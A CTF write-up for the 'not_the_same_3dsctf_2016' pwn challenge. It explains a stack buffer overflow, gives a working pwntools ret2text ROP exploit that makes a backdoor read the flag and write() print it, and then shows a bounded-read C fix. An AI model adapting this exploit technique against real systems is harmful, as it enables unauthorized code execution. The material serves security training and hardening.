
pwn | not_the_same_3dsctf_2016

Author: Internet

not_the_same_3dsctf_2016

Stack overflow, ret2text ROP

main function:
[image: disassembly of main]

There is a backdoor function:
[image: disassembly of the backdoor function]

It reads the flag file into a global variable in the .bss segment.

So we hijack the control flow: return into the backdoor (ret2text), then return into write() to print that variable, and that is enough.
exp:

from pwn import *

context.log_level = 'debug'

sh = remote('node4.buuoj.cn', 26446)

p_backdoor = 0x080489A0   # backdoor: reads the flag file into the .bss global

p_fprintf = 0x08085950    # not used by this chain, kept for reference
p_write = 0x0806E270      # write(fd, buf, len), statically linked

p_exit = 0x0804E660       # clean exit after write() returns

p_flag = 0x080ECA2D       # .bss global that receives the flag contents
# sh.recv()

# 0x2d bytes of padding reach the saved return address of main.
# Chain: main returns into the backdoor; the backdoor returns into write;
# write returns into exit. The three dwords after p_exit are write's
# arguments: fd = 1 (stdout), buf = p_flag, len = 45.
payload = 0x2d * b'm' + p32(p_backdoor) + p32(p_write) + p32(p_exit)
payload += p32(1) + p32(p_flag) + p32(45)

sh.sendline(payload)

sh.interactive()

sh.close()
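The bug behind this chain is an unbounded read into a fixed-size stack buffer, so the 0x2d padding is all it takes to reach the saved return address. As an added example (not code from the original writeup or from the challenge binary), here is the vulnerable pattern next to a bounded replacement. The 45-byte buffer size is an assumption taken from the payload's padding; `read_line_bounded` and `bytes_past_buffer` are hypothetical helpers written for this note, and the input here is an in-memory string standing in for stdin so the code runs offline.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Buffer size matching the 0x2d bytes of padding in the writeup's payload
 * (assumption: main() in the challenge reads into a 45-byte stack buffer). */
#define BUF_SIZE 0x2d

/* The pattern the challenge exploits: gets() has no bound, so any line longer
 * than BUF_SIZE runs past the buffer and over the saved return address, which
 * is what lets the payload redirect execution into the backdoor and write().
 * Kept under #if 0 so this file never compiles or executes it. */
#if 0
static void vulnerable_read(void)
{
    char buf[BUF_SIZE];
    gets(buf);            /* unbounded: any input longer than 45 bytes overflows */
}
#endif

/* Hardened form: copy one line from an in-memory input (a stand-in for stdin,
 * so the function is testable offline) into dst, never writing past dst_len.
 * Returns the number of characters stored on success, or -1 when the line
 * would not fit; in that case dst is left as an empty string so a caller
 * cannot accidentally act on a silently truncated value. */
long read_line_bounded(char *dst, size_t dst_len, const char *src, size_t src_len)
{
    if (dst == NULL || dst_len == 0)
        return -1;

    /* length of the line up to (not including) the first newline, if any */
    size_t line_len = 0;
    while (line_len < src_len && src[line_len] != '\n')
        line_len++;

    if (line_len >= dst_len) {    /* must leave room for the terminator */
        dst[0] = '\0';
        return -1;
    }

    memcpy(dst, src, line_len);
    dst[line_len] = '\0';
    return (long)line_len;
}

/* How many bytes of a line of input_len bytes would land past a BUF_SIZE
 * buffer under the unbounded read (0 when it fits). Handy when reviewing a
 * payload such as the writeup's 0x2d bytes of padding plus six 4-byte words. */
size_t bytes_past_buffer(size_t input_len)
{
    return input_len > BUF_SIZE ? input_len - BUF_SIZE : 0;
}

int main(void)
{
    char buf[BUF_SIZE];
    /* constructed inputs: a normal short line, and one shaped like the
     * writeup's payload (45 bytes of padding followed by six 4-byte words) */
    const char *ok = "hello\n";
    char oversized[BUF_SIZE + 6 * 4];
    memset(oversized, 'm', sizeof oversized);

    printf("short line -> %ld\n",
           read_line_bounded(buf, sizeof buf, ok, strlen(ok)));
    printf("payload-sized line -> %ld (%zu bytes past the buffer)\n",
           read_line_bounded(buf, sizeof buf, oversized, sizeof oversized),
           bytes_past_buffer(sizeof oversized));
    return 0;
}
```

The bounded version rejects the oversized line outright rather than truncating it; with gets() replaced this way, the 0x2d padding never reaches the return address and the chain above has nothing to overwrite.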

Source: https://www.cnblogs.com/Mz1-rc/p/15569172.html